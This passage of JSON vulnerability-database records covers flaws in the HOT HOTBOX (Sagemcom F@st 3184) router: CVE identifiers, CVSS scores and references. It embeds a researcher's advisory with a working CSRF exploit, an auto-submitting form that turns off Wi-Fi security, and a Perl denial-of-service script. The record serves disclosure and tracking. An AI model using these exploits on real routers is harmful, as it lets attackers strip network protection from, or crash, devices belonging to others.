            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-65039",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-65039"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2013-5037",
            "trust": 3.5
          },
          {
            "db": "PACKETSTORM",
            "id": "123901",
            "trust": 3.2
          },
          {
            "db": "BID",
            "id": "63550",
            "trust": 0.9
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005731",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-560",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2014-00015",
            "trust": 0.6
          },
          {
            "db": "EXPLOIT-DB",
            "id": "29518",
            "trust": 0.1
          },
          {
            "db": "SEEBUG",
            "id": "SSVID-83016",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-65039",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00015"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65039"
          },
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005731"
          },
          {
            "db": "PACKETSTORM",
            "id": "123901"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-560"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5037"
          }
        ]
      },
      "id": "VAR-201312-0131",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00015"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65039"
          }
        ],
        "trust": 1.325
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00015"
          }
        ]
      },
      "last_update_date": "2025-04-11T22:48:26.791000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "http://www.hot.net.il/heb/Main/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005731"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-255",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-65039"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005731"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5037"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.1,
            "url": "http://packetstormsecurity.com/files/123901/hotbox-2.1.11-csrf-traversal-denial-of-service.html"
          },
          {
            "trust": 2.4,
            "url": "http://www.youtube.com/watch?v=cplt09zij48"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5037"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-5037"
          },
          {
            "trust": 0.3,
            "url": "http://www.sagemcom.com/index.php?id=1760\u0026l=25"
          },
          {
            "trust": 0.3,
            "url": "http://seclists.org/fulldisclosure/2013/nov/17"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5038"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5220"
          },
          {
            "trust": 0.1,
            "url": "http://$host/goform/login\";"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.1.1/goform/wlanbasicsecurity\u0027"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5037"
          },
          {
            "trust": 0.1,
            "url": "http://elisyan.com/hotboxcsrf.html"
          },
          {
            "trust": 0.1,
            "url": "http://elisyan.com/hotboxdos.pl,"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5039"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5219"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5218"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00015"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65039"
          },
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005731"
          },
          {
            "db": "PACKETSTORM",
            "id": "123901"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-560"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5037"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00015"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65039"
          },
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005731"
          },
          {
            "db": "PACKETSTORM",
            "id": "123901"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-560"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5037"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-01-02T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2014-00015"
          },
          {
            "date": "2013-12-30T00:00:00",
            "db": "VULHUB",
            "id": "VHN-65039"
          },
          {
            "date": "2013-09-09T00:00:00",
            "db": "BID",
            "id": "63550"
          },
          {
            "date": "2014-01-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-005731"
          },
          {
            "date": "2013-11-04T13:03:33",
            "db": "PACKETSTORM",
            "id": "123901"
          },
          {
            "date": "2013-12-31T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201312-560"
          },
          {
            "date": "2013-12-30T04:53:07.147000",
            "db": "NVD",
            "id": "CVE-2013-5037"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-01-02T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2014-00015"
          },
          {
            "date": "2013-12-30T00:00:00",
            "db": "VULHUB",
            "id": "VHN-65039"
          },
          {
            "date": "2013-09-09T00:00:00",
            "db": "BID",
            "id": "63550"
          },
          {
            "date": "2014-01-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-005731"
          },
          {
            "date": "2013-12-31T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201312-560"
          },
          {
            "date": "2025-04-11T00:51:21.963000",
            "db": "NVD",
            "id": "CVE-2013-5037"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "specific network environment",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-560"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "HOT HOTBOX Router Vulnerabilities in pre-shared keys in software",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005731"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "trust management",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-560"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201312-0374

    Vulnerability from variot - Updated: 2025-04-11 22:48

    Cross-site scripting (XSS) vulnerability on the HOT HOTBOX router with software 2.1.11 allows remote attackers to inject arbitrary web script or HTML via a crafted DHCP Host Name option, which is not properly handled during rendering of the DHCP table in wlanAccess.asp. HOT HOTBOX router is a router device. Sagemcom f@st 3184 routers are prone to the following security vulnerabilities: 1. An Information-disclosure Vulnerability 2. An Authentication-bypass vulnerability 3. A Remote Denial-of-service Vulnerability 4. A Directory-traversal Vulnerability 5. An HTML-injection Vulnerability 6. A Cross-site Request-forgery Vulnerability An attacker can exploit these issues to gain access to potentially sensitive information, bypass certain security restrictions to perform unauthorized actions, steal cookie-based authentication credentials and gain access to system. Other attacks are also possible Sagemcom f@st 3184 running firmware 2.1.11 is vulnerable; prior versions may also be affected. A cross-site scripting vulnerability exists in HOT HOTBOX routers using software version 2.1.11. +------------------------------------------------------------------------------+ | HOTBOX is the leading router/modem appliance of | | HOT Cable communication company in israel. | | The Appliance is manufactured by SAGEMCOM | | and carries the model name F@st 3184. | +------------------------------------------------------------------------------+ | Title: HOTBOX Multiple Vulnerabilities | +--------------------+---------------------------------------------------------+ | Release Date | 2013/09/09 | | Researcher | Oz Elisyan | +--------------------+---------------------------------------------------------+ | System Affected | HOTBOX Router/Modem | | Versions Affected | 2.1.11 , possibly earlier | | Related CVE Numbers | CVE-2013-5037, CVE-2013-5038| | CVE-2013-5220, CVE-2013-5219, CVE-2013-5218, | | CVE-2013-5039 | | Vendor Patched | N/A | | Classification | 0-day | | Exploits | http://elisyan.com/hotboxDoS.pl, | | http://elisyan.com/hotboxCSRF.html | +--------------------+---------------------------------------------------------+

    Vulnerabilities List -

    Default WPS Pin

    Authentication based on IP Address

    DoS via crafted POST

    Path/Directory Traversal

    Script injection via DHCP request

    No CSRF Token

    Demo - http://www.youtube.com/watch?v=CPlT09ZIj48

    CSRF EXPLOIT:

    document.getElementById(1).submit();

    DENIAL OF SERVICE EXPLOIT:

    use warnings; use HTTP::Request::Common qw(POST); use LWP::UserAgent;

    Author: Oz Elisyan

    Date: 3 September 2013

    Affected Version: <= 2.1.11

    print "# HOTBOX DoS PoC #\n\n"

    unless ($ARGV[0]){ print "Please Enter Valid Host Name.\n"; exit(); }

    print "Sending Evil POST request...\n";

    my $HOST = $ARGV[0]; my $URL = "http://$HOST/goform/login"; my $PostData = "loginUsername=aaaloginPassword=aaa" my $browser = LWP::UserAgent->new(); my $req = HTTP::Request->new(POST => $URL); $req->content_type("application/x-www-form-urlencoded"); $req->content($PostData); my $resp = $browser->request($req);

    print "Done.";

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201312-0374",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "hotbox router",
            "scope": "eq",
            "trust": 3.0,
            "vendor": "hot",
            "version": "2.1.11"
          },
          {
            "model": "hotbox router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "hot",
            "version": null
          },
          {
            "model": "hotbox router",
            "scope": null,
            "trust": 0.8,
            "vendor": "hot",
            "version": null
          },
          {
            "model": "f@st router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sagecom",
            "version": "31842.1.11"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00018"
          },
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005734"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-563"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5218"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/h:hot:hotbox_router",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:hot:hotbox_router_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005734"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Oz Elisyan",
        "sources": [
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "PACKETSTORM",
            "id": "123901"
          }
        ],
        "trust": 0.4
      },
      "cve": "CVE-2013-5218",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 2.9,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 5.5,
                "id": "CVE-2013-5218",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 1.8,
                "vectorString": "AV:A/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 2.9,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 5.5,
                "id": "CNVD-2014-00018",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 0.6,
                "vectorString": "AV:A/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 2.9,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 5.5,
                "id": "VHN-65220",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 0.1,
                "vectorString": "AV:A/AC:M/AU:N/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2013-5218",
                "trust": 1.0,
                "value": "LOW"
              },
              {
                "author": "NVD",
                "id": "CVE-2013-5218",
                "trust": 0.8,
                "value": "Low"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2014-00018",
                "trust": 0.6,
                "value": "LOW"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201312-563",
                "trust": 0.6,
                "value": "LOW"
              },
              {
                "author": "VULHUB",
                "id": "VHN-65220",
                "trust": 0.1,
                "value": "LOW"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00018"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65220"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005734"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-563"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5218"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Cross-site scripting (XSS) vulnerability on the HOT HOTBOX router with software 2.1.11 allows remote attackers to inject arbitrary web script or HTML via a crafted DHCP Host Name option, which is not properly handled during rendering of the DHCP table in wlanAccess.asp. HOT HOTBOX router is a router device. Sagemcom f@st 3184 routers are prone to the following security vulnerabilities:\n1. An Information-disclosure Vulnerability\n2. An Authentication-bypass vulnerability\n3. A Remote Denial-of-service Vulnerability\n4. A Directory-traversal Vulnerability\n5. An HTML-injection Vulnerability\n6. A Cross-site Request-forgery Vulnerability\nAn attacker can exploit these issues to  gain access to potentially  sensitive information, bypass certain security restrictions to perform  unauthorized  actions, steal cookie-based authentication credentials and  gain access to system. Other attacks are also possible\nSagemcom f@st 3184 running firmware 2.1.11 is vulnerable; prior versions may also be affected. A cross-site scripting vulnerability exists in HOT HOTBOX routers using software version 2.1.11. +------------------------------------------------------------------------------+\n| HOTBOX is the leading router/modem appliance of      |\n|  HOT Cable communication company in israel.           |\n| The Appliance is manufactured by SAGEMCOM         |\n| and carries the model name F@st 3184.                     |\n+------------------------------------------------------------------------------+\n| Title: HOTBOX Multiple Vulnerabilities                         |\n+--------------------+---------------------------------------------------------+\n| Release Date       | 2013/09/09                                    |\n| Researcher         | Oz Elisyan                                     |\n+--------------------+---------------------------------------------------------+\n| System Affected    | HOTBOX Router/Modem               |\n| Versions Affected  | 2.1.11 , possibly earlier                 |\n| Related CVE Numbers | CVE-2013-5037, CVE-2013-5038|\n| CVE-2013-5220, CVE-2013-5219, CVE-2013-5218,       |\n| CVE-2013-5039                                                         |\n| Vendor Patched | N/A                                                 |\n| Classification     | 0-day                                              |\n| Exploits | http://elisyan.com/hotboxDoS.pl,                  |\n| http://elisyan.com/hotboxCSRF.html                           |\n+--------------------+---------------------------------------------------------+\n\nVulnerabilities List -\n# Default WPS Pin\n# Authentication based on IP Address\n# DoS via crafted POST\n# Path/Directory Traversal\n# Script injection via DHCP request\n# No CSRF Token\n\nDemo -\nhttp://www.youtube.com/watch?v=CPlT09ZIj48\n\n\n\nCSRF EXPLOIT: \n\n\n\u003chtml\u003e\n    \u003cform action=\u0027http://192.168.1.1/goform/wlanBasicSecurity\u0027 method=\u0027POST\u0027 id=1\u003e\n        \u003cinput type=hidden name=\"WirelessMacAddr\" value=\"C0%3AAC%3A54%3AF8%3A67%3A58\" id=\"WirelessMacAddr\"\u003e\n        \u003cinput type=hidden name=\"WirelessEnable1\" value=\"1\" id=\"WirelessEnable1\"\u003e\n\t\t\u003cinput type=hidden name=\"ServiceSetIdentifier1\" value=\"Elisyan\" id=\"ServiceSetIdentifier1\"\u003e\n\t\t\u003cinput type=hidden name=\"WirelessVendorMode\" value=\"3\" id=\"WirelessVendorMode\"\u003e\n\t\t\u003cinput type=hidden name=\"ChannelNumber1\" value=\"0\" id=\"ChannelNumber1\"\u003e\n\t\t\u003cinput type=hidden name=\"NBandwidth1\" value=\"20\" id=\"NBandwidth1\"\u003e\n\t\t\u003cinput type=hidden name=\"ClosedNetwork1\" value=\"0\" id=\"ClosedNetwork1\"\u003e\n\t\t\u003cinput type=hidden name=\"WifiSecurity\" value=\"0\" id=\"WifiSecurity\"\u003e\n\t\t\u003cinput type=hidden name=\"commitwlanBasicSecurity\" value=\"1\" id=\"commitwlanBasicSecurity\"\u003e\n\t\t\u003cinput type=hidden name=\"restoreWirelessDefaults1\" value=\"0\" id=\"restoreWirelessDefaults1\"\u003e\n\t\t\u003cinput type=hidden name=\"scanActions1\" value=\"0\" id=\"scanActions1\"\u003e\n\t\t\u003cinput type=hidden name=\"AutoSecurity1\" value=\"1\" id=\"AutoSecurity1\"\u003e\n\t\t\u003cinput type=hidden name=\"wpsActions1\" value=\"0\" id=\"wpsActions1\"\u003e\n\t\t\n\n    \u003c/form\u003e\n\u003c/html\u003e\n\u003cscript\u003edocument.getElementById(1).submit();\u003c/script\u003e\n\n\n\nDENIAL OF SERVICE EXPLOIT:\n\nuse warnings;\nuse HTTP::Request::Common qw(POST);\nuse LWP::UserAgent;\n\n\n# Author: Oz Elisyan\n# Date: 3 September 2013\n# Affected Version: \u003c= 2.1.11\n\nprint \"# HOTBOX DoS PoC #\\n\\n\"\n\nunless ($ARGV[0]){\n\tprint \"Please Enter Valid Host Name.\\n\";\n\texit();\n}\n\nprint \"Sending Evil POST request...\\n\";\n\nmy $HOST = $ARGV[0];\nmy $URL = \"http://$HOST/goform/login\";\nmy $PostData = \"loginUsername=aaaloginPassword=aaa\"\nmy $browser = LWP::UserAgent-\u003enew();\nmy $req = HTTP::Request-\u003enew(POST =\u003e $URL);\n$req-\u003econtent_type(\"application/x-www-form-urlencoded\");\n$req-\u003econtent($PostData);\nmy $resp = $browser-\u003erequest($req);\n\nprint \"Done.\";\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2013-5218"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005734"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2014-00018"
          },
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65220"
          },
          {
            "db": "PACKETSTORM",
            "id": "123901"
          }
        ],
        "trust": 2.61
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-65220",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-65220"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2013-5218",
            "trust": 3.5
          },
          {
            "db": "PACKETSTORM",
            "id": "123901",
            "trust": 3.2
          },
          {
            "db": "BID",
            "id": "63550",
            "trust": 0.9
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005734",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-563",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2014-00018",
            "trust": 0.6
          },
          {
            "db": "EXPLOIT-DB",
            "id": "29518",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-65220",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00018"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65220"
          },
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005734"
          },
          {
            "db": "PACKETSTORM",
            "id": "123901"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-563"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5218"
          }
        ]
      },
      "id": "VAR-201312-0374",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00018"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65220"
          }
        ],
        "trust": 1.325
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00018"
          }
        ]
      },
      "last_update_date": "2025-04-11T22:48:26.745000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "http://www.hot.net.il/heb/Main/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005734"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-65220"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005734"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5218"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.1,
            "url": "http://packetstormsecurity.com/files/123901/hotbox-2.1.11-csrf-traversal-denial-of-service.html"
          },
          {
            "trust": 2.4,
            "url": "http://www.youtube.com/watch?v=cplt09zij48"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5218"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-5218"
          },
          {
            "trust": 0.3,
            "url": "http://www.sagemcom.com/index.php?id=1760\u0026l=25"
          },
          {
            "trust": 0.3,
            "url": "http://seclists.org/fulldisclosure/2013/nov/17"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5038"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5220"
          },
          {
            "trust": 0.1,
            "url": "http://$host/goform/login\";"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.1.1/goform/wlanbasicsecurity\u0027"
          },
          {
            "trust": 0.1,
